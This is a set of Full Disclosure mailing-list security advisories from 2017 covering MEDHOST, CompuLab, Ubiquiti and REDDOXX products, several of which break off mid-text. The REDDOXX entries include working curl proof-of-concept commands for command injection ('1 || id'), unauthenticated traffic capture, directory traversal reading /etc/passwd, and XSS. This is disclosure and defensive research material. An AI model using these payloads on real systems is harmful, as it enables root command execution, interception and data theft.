[FD] MEDHOST Connex contains hard-coded database credentials
Overview MEDHOST Connex for all versions contains hard-coded credentials that are used for customer database access. This is a new vulnerability not related to CVE-2016-4328. Description MEDHOST Connex contains hard-coded credentials that are used for customer database access. An attacker with knowledge of the hard-coded credentials and the ability to communicate directly with the database may be able to obtain or modify sensitive patient and financial information. Connex utilizes an IBM i DB2 user account for database access. The account name is HMSCXPDN. This password is hard-coded in multiple places of the application. Customers do not have the option to change this password. The account has elevated DB2 roles, and can access all objects or database tables on the customer DB2 database. This account can access data through odbc, ftp, and telnet. Customers w/o Connex installed are still vulnerable. The MEDHOST setup program creates this account. Connex provides connectivity to exchange clinical information with the MEDHOST application. /1 Impact An attacker with knowledge of the hard-coded credentials and the ability to communicate directly with the application database server may be able to obtain or modify patient and financial information. Solution The vendor has not issued a patch and has been unresponsive to this information after 3 attempts to communicate. Restrict network access As a general security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from using the hard-coded database credentials from a blocked network location. References /1 http://www.clinical-innovation.com/topics/health- it/himss-hms-launches-hms-connex-showcase-ambulatory-ehr ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Faraday v2.6: Collaborative Penetration Test and Vulnerability Management Platform
Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way! Check out the Faraday project in Github. https://github.com/infobyte/faraday In the last couple of versions we added several features to allow our users to manage more and more parts of their engagements directly from our platform so we realized, why not also add the option to manage methodologies and tasks? And so we did! * Kanban Tasks View: Now you can create your custom methodologies, add tasks, tag them and keep track of your whole project directly from Faraday. * Improving the Data Analysis tools: As per your requests, we made some changes to the existing Data Analysis tools introduced in the last release. We added the possibility to change data configuration in order to customize charts, a new bar chart type to show most vulnerable services and a filter for undefined or null values. * Executive Report clean up: Some users reported issues with the sorting of Hosts and Evidence in the reports. We fixed it so the hosts in grouped reports are sorted by IP and evidence is sorted by alphabetically by name. We know sometimes it is necessary to use special characters for evidence names. Some of our users * Web UI : Now you can manually create the same vulnerability in several hosts at once! Select as many targets as you want when creating your vulns. - Add vuln to multiple targets at once Also, we made the vulnerability creation modal more consistent with the rest of the views by starting the pagination of the targets in page 1 instead of 0. Changes: - Improved Data analysis charts. Added more chart properties and data binding - Improved target ordering in grouped reports - Fixed bug with new line character in reports DOCX - Adds alphabetical sort for Evidence in the Executive Report - Fix bug updating users with no roles - Fixed report creation with evidence names containing special chars - Added Tasks Management to the Web UI - Added the ability to select more than one target when creating a vuln in the Web UI - Merged PR #182 - problems with zonatransfer.me - Fixed bug in Download CSV of Status report with old versions of Firefox - Fixed formula injection vulnerability in export to CSV feature - Fixed DOM-based XSS in the Top Services widget of the dashboard - Fix in AppScan plugin - Fix HTML injection in Vulnerability template - Add new plugin: Junit XML - Improved pagination in new vuln modal of status report - Added "Policy Violations" field for Vulnerabilities We hope you enjoy it, and let us know if you have any questions or comments. Come to #BHUSA - Mandalay Bay - Business Hall (July 26th - 27th) We will be at booth IC43 https://www.blackhat.com/us-17/event-sponsors.html#faraday https://www.faradaysec.com https://github.com/infobyte/faraday https://twitter.com/faradaysec https://forum.faradaysec.com/ https://www.faradaysec.com/ideas ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-9457 CompuLab Intense PC lacks firmware signature validation
Credits: Hal Martin Website: watchmysys.com Source: https://watchmysys.com/blog/2017/07/cve-2017-9457-compulab-intense-pc-lacks-firmware-validation/ Vendor: CompuLab (compulab.com) Product: Intense PC / MintBox 2 Vulnerability type: Platform lacks signature verification and does not validate firmware update before flashing CVE Reference: CVE-2017-9457 Summary: Since 2013 CompuLab manufactures and sells the Intense PC (also sold under the name "MintBox 2"), which is a small Intel-based fanless PC sold to end-users and industrial customers. It was discovered that there is no signature validation of the UEFI firmware update file before flashing, allowing an attacker to silently flash a modified UEFI firmware to flash using the standard Phoenix update utility. CompuLab have indicated via email that capsule signature validation is disabled by default by the IBV (Phoenix) for this platform. No timeline was provided to implement capsule signature verification. Affected versions: All firmware versions since product release (latest public firmware is 21 May 2017) Attack Vector: An attacker tricks the user into running a malicious executable with local administrator privileges, which updates the system firmware to include the attacker's code. The attacker may instead use a known OS exploit to perform the upgrade remotely (without user interaction or notification). Proof of concept: I have created a modified firmware update which replaces the stock UEFI shell with the UEFI shell from EDK2. The update can be flashed from within Windows without any user interaction or notification. Firmware updates are not signed by CompuLab or verified by the existing firmware before upgrade. The modified update, based on the 21 May 2017 firmware, can be downloaded here: https://watchmysys.com/blog/wp-content/uploads/2017/07/update-IPC-20170521-edk2.zip Details of the full proof of concept can be found at the Source link above. Mitigation: At this time there is no means for the end user to enable Capsule Signature verification or to prevent the Phoenix update utility from updating the system firmware. Therefore Intense PC owners should consider the following options: - Ensure your operating system is up to date with the latest security patches. Do not run software from untrusted sources. - Do not connect your Intense PC to any networks with internet access (i.e. air-gap the computer). - Discontinue your use of the Intense PC and consider replacing the computer with one from a different manufacturer who implements signature validation for firmware updates. Disclosure timeline: 6 June 2017: Issue reported to CompuLab 6 June 2017: CompuLab confirms that “Default settings of this source tree [Phoenix SecureCore Tiano Enhanced Intel Ivy Bridge CPU Panther Point M] has disabled Capsule Signature option.” 6 June 2017: Issue is reported to MITRE 6 June 2017: Vulnerability is assigned CVE-2017-9457 7 June 2017: CompuLab are informed that the vulnerability has been assigned CVE-2017-9457 and details of the vulnerability will be published after 45 days 22 July 2017: Details of the vulnerability are published ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 > === title: Open Redirect in Login Page product: Multiple Ubiquiti Networks products, e.g. TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16, AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M, AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti, BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5, locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22, NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365, NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP, Power AP N vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW) fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW) CVE number: impact: Low homepage: https://www.ubnt.com/ found: 2017-03-22 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: SEC Consult recommends not to use the devices in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Open Redirect in Login Page - HackerOne #158287 A open redirect vulnerability can be triggered by luring an attacked user to authenticate to a Ubiquiti AirOS device by clicking on a crafted link. This vulnerability was found earlier by another bug bounty participant on HackerOne. It was numbered with #158287. Proof of concept: - http:///login.cgi?uri=https://www.sec-consult.com After a successful login, the user will be redirected to https://www.sec-consult.com. Vulnerable / tested versions: - Ubiquiti Networks AirRouter (v6.0.1) Ubiquiti Networks TS-8-PRO (v1.3.4) Based on information embedded in the firmware of other Ubiquiti products gathered from our IoT Inspector tool we believe the following devices are affected as well: Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1) Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1) Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1) Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1) Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1) Ubiquiti Networks RM2-Ti (Version: XW v6.0.1) Ubiquiti Networks RM5-Ti (Version: XW v6.0.1) Vendor contact timeline: 2017-03-22: Contacting vendor via HackerOne. 2017-03-22: Vendor marked open redirect as duplicate to: #158287 The contact also states that this issue will be resolved in the next release. 2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor and confirmed the fix - provide at least 90 days for customers to apply the patch. 2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-07-24. 2017-07-24: Public release of security advisory Solution: - Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later. Workaround: --- No workaround Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of
[FD] SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 > === title: Cross-Site Scripting (XSS) product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP vulnerable version: Firmware v1.9.1 fixed version: Firmware v1.9.1.1 CVE number: impact: Medium homepage: https://www.ubnt.com found: 2017-04-04 by: R. Freingruber, T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Reflected Cross Site Scripting (XSS) in Internet Explorer This vulnerability can be exploited by deactivating or bypassing the integrated XSS-filter of the Internet Explorer. A reflected cross site scripting vulnerability was identified because of an initialization error in "/files/index/". An attacker can exploit this vulnerability by tricking a victim to visit a malicious website. The attacker is able to hijack the session of the attacked user. If the user is currently not logged in, the injected JavaScript code can start a bruteforce attack (for example, with the default credentials ubnt:ubnt). After a session has been established, the code has full control over the system via the CLI feature which is basically a shell wrapper. By abusing this vulnerability an attacker can open ports on the router or start a reverse shell. Proof of concept: - 1) Reflected Cross Site Scripting (XSS) in Internet Explorer The following URL can be used as PoC: https://192.168.1.1/files/index/0/aaa
[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance
Advisory: Remote Command Execution as root in REDDOXX Appliance RedTeam Pentesting discovered a remote command execution vulnerability in the REDDOXX appliance software, which allows attackers to execute arbitrary command with root privileges while unauthenticated. Details === Product: REDDOXX Appliance Affected Versions: <= Build 2032 / v2.0.625 Fixed Versions: Version 2032 SP2 Vulnerability Type: Remote Command Execution Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details The administrative interface of the REDDOXX appliance [0] offers several diagnostic tools in the "Diagnostic Center". Ping is one of these tools. The interface for this tool contains two input fields, which allow users to specify a target host and a packet count. Through the ISO provided on the vendor's homepage [1], it was possible to analyze how these commands are embedded into the command-line of the ping command: function ExecuteDiag($parameter) { // Here we do the main thing ... $cmd = "ping '" . $parameter->targetHost . "' -c " . $parameter->count; $this->PrintHeader(); $this->PrintHeadLine(array('Result Message', 'Status')); $this->PrintOut(""); $this->PrintOut(""); passthru($cmd, $rc); $this->PrintOut(""); $this->PrintStatus($rc); $this->PrintOut(""); $this->PrintEnd(); $result = new stdClass; $result->ResultCode = $rc; $result->MessageText = ""; $this->SaveResult($result); } As can be seen in the listing above, the parameters are embedded into a string stored in the variable $cmd. The target host parameter is surrounded with single quotes, while the count parameter is not. Before the parameters are actually embedded into the ping command-line however, the following function performs a check for "illegal characters": public static function CheckShellParameter($parameter, $key = "") { if (!is_array($parameter)) $parameter = array($parameter); foreach ($parameter as $value) { if (preg_match("/[';<>\"]/", $value)) { $paramNameMsg = ""; if ($key) $paramNameMsg = " in parameter '$key'"; throw new Exception("Invalid value" . $paramNameMsg . ". Illegal characters found.", 1); } } } These are characters, which can be used to append additional commands to the command line. While this check prevents certain kinds of attacks, it is incomplete and can therefore be bypassed. For example, && (AND) and || (OR) operators can still be used to append additional commands to the command-line. Submitting a count target host of "127.0.0.1" and a count of "1 || id" leads to the following command-line being passed to the PHP passthru() function and executed: ping '127.0.0.1' -c 1 || id This causes the command "id" to be executed after the execution of the ping command is completed. Proof of Concept The following curl command-lines can be used to trigger the vulnerability. First, the diagnose function ping is called as follows: $ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",'\ '"Parameter":{"targetHost":"127.0.0.1","count":"1'\ '&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' \ http://www.example.com/api/v1/rws/diagnose/start Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are only used to distinguish the output of the "id" command in the final result, which can be retrieved and displayed using the following curl command-line:
[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance RedTeam Pentesting discovered a vulnerability which allows attackers unauthenticated access to the diagnostic functions of the administrative interface of the REDDOXX appliance. The functions allow, for example, to capture network traffic on the appliance's interfaces. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Authentication Bypass Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details The administrative interface of the REDDOXX appliance [0] offers several diagnostic tools in the "Diagnostic Center". Tcpdump is one of these tools. This tool can be used to capture network traffic on local interfaces. During a penetration test, it was discovered that this function, as well as the other diagnostic functions, does not require authentication. Proof of Concept The following curl command-line can be used to start the capture process: $ curl --include --silent -H 'Content-Type: application/json' \ --data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \ http://www.example.com/api/v1/rws/diagnose/start HTTP/1.1 200 OK Date: Thu, 18 May 2017 14:58:22 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 [...] Content-Length: 0 Content-Type: application/xml The following curl command-line stops the capture process: $ curl --include --silent -H 'Content-Type: application/json' \ --data-binary '{"Name":"Tcpdump"}' \ http://www.example.com/api/v1/rws/diagnose/stop HTTP/1.1 200 OK Date: Thu, 18 May 2017 15:00:17 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 [...] Content-Length: 0 Content-Type: application/xml After the capture process is complete, the resulting capture file can be downloaded without authentication: $ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap [...] Connecting to www.example.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap] Saving to: ‘tcpdump.cap’ tcpdump.cap 100%[===>] 1.72M [...] 2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530] None of these requests contain any credentials or cookies, which could provide authentication. Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = The diagnostic functions of the REDDOXX appliance can be used without authentication. This allows attackers to, for example, capture network traffic. During a penetration test it was possible to capture multiple emails and also POP3 login attempts with cleartext credentials. This is rated as a high risk. Timeline 2017-05-17 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-07-20 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at:
[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to list directory contents and download arbitrary files from the affected system with root permissions. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Arbitrary File Disclosure Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details When using the user frontend of the REDDOXX appliance [0] reachable via http://www.example.com/rws/user/, HTTP POST requests are used to perform certain actions. For example, the following request is used to save the settings of the current user's profile: POST /RdxEngine/json HTTP/1.1 Host: www.example.com [...] Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close { "method": "CoreService.SaveUserProfile", "params": { "Profile": { "UseHtmlMail": true, "DefaultArchiveDisplayPeriode": "5", "ReportLanguage": "en", "EnableQueueReport": true } }, "id": "{----}" } Through analysis of the .NET binaries pertaining to this endpoint, extracted from the appliance ISO offered on the vendor's homepage [1], the methods handling these requests were examined. For the "SaveUserProfile" method, which is specified through the POST parameter "method", the code is as follows: // Reddoxx.Api.Legacy.CoreServiceService public void SaveUserProfile(TRoUserProfile Profile) { try { this.client.OnStartRequest("CoreService", "SaveUserProfile"); this.Service.SaveUserProfile(Profile); this.client.OnEndRequest("CoreService", "SaveUserProfile"); } catch (System.Exception e) { this.client.HandleException("CoreService", "SaveUserProfile", e); } } The "TroUserProfile" class contains information about the parameters that are required for valid requests to this method: namespace Reddoxx.Api.Legacy { [...] public class TRoUserProfile : ComplexType { private string __ReportLanguage; private int __DefaultArchiveDisplayPeriode; private bool __EnableQueueReport; private bool __UseHtmlMail; [...] } } These variable names correspond to the POST parameters contained in the request that was created when the profile was saved. With this knowledge about how methods are called and parameters are passed, it was attempted to call other methods from different packages. It was determined that it is possible to access certain methods which allow reading arbitrary files and directory listings. It was later discovered that the process handling requests to the vulnerable methods runs with root privileges. Proof of Concept At least two methods are found to be of interest for attackers: FileTransfer.GetDirectoryList, which returns a directory listing for a path specified via a parameter, and FileTransfer.DownloadFile, which returns the file specified via a parameter in Base64-encoded form. The following curl command-lines can be used to call the respective methods: $ curl --silent --data-binary '{"id":"{----}",'\ '"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \ 'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName' "chatscripts" "gtk-2.0" "xen" "dbus-1" "request-key.d" "smartmontools" "console" "skel"
[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance
Advisory: Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to download arbitrary files from the affected system. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Arbitrary File Disclosure Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-004 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details The REDDOXX appliance [0] contains a PHP script called download.php. It is available at http://www.example.com/download.php in normal installations and resides at /opt/reddoxx/local/htdocs/download.php in the local filesystem of the appliance. Through the ISO provided on the vendor's homepage [1], it was possible to analyze this file and any other file in a typical REDDOXX appliance installation. The file contains the following source code (shortened to relevant sections): '') { $file = $fileName; $fileID = basename($fileName); } // Currently we only allow downloads from session directories if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) && (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) { die('File is not in session directory: ' . $file); } if(!file_exists($file)) { [...] } else { // Set headers header('Pragma: public'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Cache-Control: private' ,false); header('Content-Description: File Transfer'); header('Content-Disposition: attachment; filename="' . $fileID. '"'); header('Content-Type: application/octet-stream'); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($file)); // Read the file from disk readfile($file); } ?> The script expects a URL parameter called "file" and stores its value in the variable $fileName. The value of this variable is then copied to the variable $file, which undergoes two different checks: First, the function strpos() is used to check whether a certain substring is contained in the value of the variable. The second check used the function file_exists() to determine whether the file specified in the variable is present in the filesystem. In order to circumvent the first check, a path such as /opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd can be specified, as there are no protections against directory traversal in place. This path also passes the second check imposed by the function file_exists(). Having bypassed both checks, attackers are now able to reach the readfile() function and download arbitrary files. Since no authentication checks are in place, the disclosure of arbitrary files if also possible for unauthenticated attackers. The same functionality is vulnerable to a cross-site scripting vulnerability as described in rt-sa-2017-003 [2]. Proof of Concept The following curl command-line can be used to trigger the vulnerability: $ curl --silent 'http://www.example.com/download.php?file='\ '/opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance
Advisory: Cross-Site Scripting in REDDOXX Appliance RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the REDDOXX appliance software, which allows attackers to inject arbitrary JavaScript code via a crafted URL. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-003 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details The REDDOXX appliance [0] contains a PHP script called download.php. It is available at http://www.example.com/download.php in normal installations and resides at /opt/reddoxx/local/htdocs/download.php on the local filesystem of the appliance. Through the ISO provided on the vendor's homepage [1], it was possible to analyze this file and any other file in a typical REDDOXX appliance installation. The file contains the following source code (shortened to the relevant sections): '') { $file = $fileName; $fileID = basename($fileName); } // Currently we only allow downloads from session directories if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) && (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) { die('File is not in session directory: ' . $file); } if(!file_exists($file)) { // File doesn't exist, output error die('File not found: ' . $file); } else { [...] } ?> The script expects a URL parameter called "file" and stores its value in the variable $fileName. The value of this variable is then copied to the variable $file, which undergoes two different checks: First, the function strpos() is used to check whether a certain substring is contained in the value of the variable. The second check uses the function file_exists() to determine whether the file specified in the variable is present in the filesystem. If either of these checks fail, the value of the variable $file, which is controlled by the attacker via the URL parameter, is embedded unencoded into an error message which is returned to the user with a content-type of "text/html". Proof of Concept The following curl command-lines can be used to trigger the vulnerability at both locations of the PHP script: $ curl --include 'http://www.example.com/download.php?file='\ 'alert("RedTeam%20Pentesting")' HTTP/1.1 200 OK [...] Content-Length: 78 Content-Type: text/html File is not in session directory: alert("RedTeam Pentesting") $ curl --include 'http://www.example.com/download.php?file='\ 'alert("RedTeam%20Pentesting")' HTTP/1.1 200 OK [...] Content-Length: 92 Content-Type: text/html File not found: alert("RedTeam Pentesting") In both cases, the response containing the error messages is returned with the Content-Type header set to "text/html", causing the browser to execute the injected JavaScript code. The same functionality is vulnerable to an arbitrary file disclosure attack as described in rt-sa-2017-004 [2] and indicated by the second curl command. Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = The vulnerability allows attackers to extract user's emails from the REDDOXX appliance. However, as a session ID stored in the DOM of the website is used for authentication rather than cookies, the attacked user must first log in. Once attackers have access to the user's session ID, the victim's browser can be instrumented to retrieve emails stored in the system and send them to a system under the attacker's control. The vulnerability is therefore rated as a high risk. Timeline 2017-05-16 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability